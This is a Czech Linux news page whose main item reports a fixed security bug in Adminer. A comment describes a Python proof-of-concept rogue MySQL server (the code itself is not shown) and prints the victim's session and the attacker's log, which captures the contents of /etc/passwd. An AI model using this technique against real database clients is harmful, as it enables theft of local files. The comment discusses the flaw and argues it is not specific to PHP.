abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
dnes 11:22 | Komunita

Linuxová distribuce Scientific Linux vycházející z Red Hat Enterprise Linuxu končí, verze 8 nebude vydána. Laboratoř Fermi (Fermi National Accelerator Laboratory), hlavní vývojáři Scientific Linuxu, přejde na CentOS 8. Scientific Linux ve verzích 6 a 7 bude nadále podporován.

Ladislav Hagara | Komentářů: 2
dnes 11:11 | Pozvánky

Dubnový sraz spolku OpenAlt se koná ve čtvrtek 25. 4. 2019 v Pivovarském klubu od 18:00. Najdete jej kousek od metra Florenc na adrese Křižíkova 17°, Praha 8. Sejdeme se zase u dobrého piva a popovídáme si o tématech jako umění a technologie, IoT, CNC, svobodný software, hardware a další hračky.

xkucf03 | Komentářů: 0
21.4. 22:33 | Komunita

Byly vyhlášeny výsledky letošní volby vedoucího projektu Debian (DPL). Dnešním dnem je novým vedoucím Sam Hartman.

Ladislav Hagara | Komentářů: 6
21.4. 22:11 | Nová verze

Po čtyřech měsících od vydání verze 5.5 byla vydána verze 5.6 svobodného multiplatformního softwaru pro konverzi a zpracování digitálních fotografií primárně ve formátů RAW RawTherapee (Wikipedie). Nová verze RawTherapee je k dispozici také jako balíček ve formátu AppImage. Stačí jej stáhnout, nastavit právo ke spuštění a spustit.

Ladislav Hagara | Komentářů: 0
21.4. 00:22 | Nová verze

Byla vydána verze 1.0 svobodné multiplatformní závodní hry SuperTuxKart (STK). Přehled novinek v příspěvku na blogu. Zdůraznit lze především víceuživatelský mód umožňující hrát hru po síti. Videoprezentace nejnovější verze na YouTube.

Ladislav Hagara | Komentářů: 7
20.4. 15:55 | Komunita

Ke zhlédnutí jsou videozáznamy grafických rozhraní telefonů, zatím jenom vývojových desek, Librem 5 a PinePhone. Librem 5 za 649 dolarů by měl být aktuálně k dispozici ve třetím čtvrtletí 2019. Při spuštění kampaně se mluvilo o lednu 2019. PinePhone za 150 dolarů by měl být odesílán ve čtvrtém čtvrtletí 2019.

Ladislav Hagara | Komentářů: 0
19.4. 20:22 | Nová verze

Po dvou měsících vývoje od vydání verze 6.0.0 byla oficiálně vydána nová verze 6.1.0 správce digitálních fotografií a nově i videí digiKam (digiKam Software Collection, Wikipedie). Přehled novinek i s náhledy v oficiálním oznámení. Vývojáři zdůrazňují nové API pro rozšíření DPlugins nahrazující KIPI. Ke stažení je také balíček ve formátu AppImage. Stačí jej stáhnout, nastavit právo ke spuštění a spustit.

Ladislav Hagara | Komentářů: 0
19.4. 19:55 | Nová verze

Byla vydána verze 1.16.0, tj. první stabilní verze nové řady 1.16, multiplatformního multimediálního frameworku GStreamer (Wikipedie). Z novinek lze zdůraznit vylepšení podpory WebRTC nebo AV1. Podrobnosti v poznámkách k vydání.

Ladislav Hagara | Komentářů: 0
19.4. 11:55 | Nová verze

Po více než 3 letech od vydání verze 1.3.0 byla vydána nová stabilní verze 1.4 multimediálního přehrávače MPlayer (Wikipedie). Nejnovější verze přináší kompatibilitu s verzí 4.1 a také s aktuální vývojovou verzí multiplatformní multimediální knihovny FFmpeg (Wikipedie).

Ladislav Hagara | Komentářů: 15
18.4. 23:55 | Komunita

Mozilla oznámila, že projekt Things byl přejmenován na WebThings. Nové jméno by mělo zdůraznit, že se nejedná pouze o projekt IoT (Internet věcí), ale o WoT (Web věcí). Současně byla vydána WebThings Gateway (GitHub) ve verzi 0.8 pro Raspberry Pi.

Ladislav Hagara | Komentářů: 0
Používáte headset pro virtuální realitu?
 (1%)
 (3%)
 (1%)
 (19%)
 (0%)
 (75%)
Celkem 224 hlasů
 Komentářů: 12, poslední 18.4. 01:19
Rozcestník

Bezpečnostní chyba v Admineru

Byly zveřejněny informace o bezpečnostní chybě v nástroji pro správu databází v jednom PHP souboru Adminer. Chyba je už půl roku opravena. Stačí Adminer aktualizovat.

21.1. 16:55 | Ladislav Hagara | Bezpečnostní upozornění


Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

Komentáře

Vložit další komentář

21.1. 20:27 Odin1918 | skóre: 5 | blog: Valhalla
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Admineru
Vrana k vrane seda. :-( Necht php zhyne a upadne v zapomneni.
Jendа avatar 22.1. 09:51 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Admineru
Příloha:
Z čistě edukativních důvodů, a určitě ne proto abych krmil internetového trolla a ukázal mu, že to nesouvisí s PHP, nýbrž se stejný problém vyskytuje i v jiných programovacích jazycích, jsem ten exploit přepsal do Pythonu.

Použití: Jako útočník spustíme attacker.py.

Oběť:
Python 3.7.2 (default, Jan  3 2019, 02:55:40) 
[GCC 8.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import MySQLdb
>>> connection = MySQLdb.Connect(host='127.0.0.1', user='nsa', passwd='litomerice', db='catchmeifyoucan')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/python3/dist-packages/MySQLdb/__init__.py", line 86, in Connect
    return Connection(*args, **kwargs)
  File "/usr/lib/python3/dist-packages/MySQLdb/connections.py", line 266, in __init__
    self.autocommit(autocommit)
  File "/usr/lib/python3/dist-packages/MySQLdb/connections.py", line 272, in autocommit
    _mysql.connection.autocommit(self, on)
_mysql_exceptions.OperationalError: (2013, 'Lost connection to MySQL server during query')
>>> 
Útočník vidí:
ACCEPT:  ('127.0.0.1', 40422)
> server greeting
plen 204
received data: b'\x01\x8c\xa2\x9f\x00\x00\x00\x00@\x08\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00nsa\x00\x14\xd7\xfd
\xdbj\x11\xe5\x8f\x14\x89\xeaa\x8a\xaf\xf2\xcc\x91\xea\xf7\xe0\xc4catchmeifyoucan\x00mysql_native_password\x00k\x03_os\x05Linux\x0c_client_name\nlibmariadb\x04_pid
\x0519516\x0f_client_version\x053.0.8\t_platform\x06x86_64\x0c_server_host\t127.0.0.1'
> auth accept
plen 18
received data: b'\x00\x03SET autocommit=0'
> exploit
plen 3632
received data: b'\x02root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:
/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys: [...]
Testováno na aktuálních verzích v Debianu Unstable, je mi úplně fuk že to je binárně nekompatibilní s okolním světem, a taky je mi fuk, že to u oběti hodí exception a tudíž pokud to použijete v produkci, tak si toho všimne. Je to Poc.
I was just trying to exit Vim and all of this happened!
Bedňa avatar 23.1. 00:05 Bedňa | skóre: 34 | blog: Žumpa | Horňany
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Admineru
Pekné :-)
KERNEL ULTRAS video channel >>>
Jendа avatar 22.1. 08:51 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Admineru
Komu se to nechce hledat tak tady je ten commit.
I was just trying to exit Vim and all of this happened!

Založit nové vláknoNahoru


ISSN 1214-1267   www.czech-server.cz
© 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.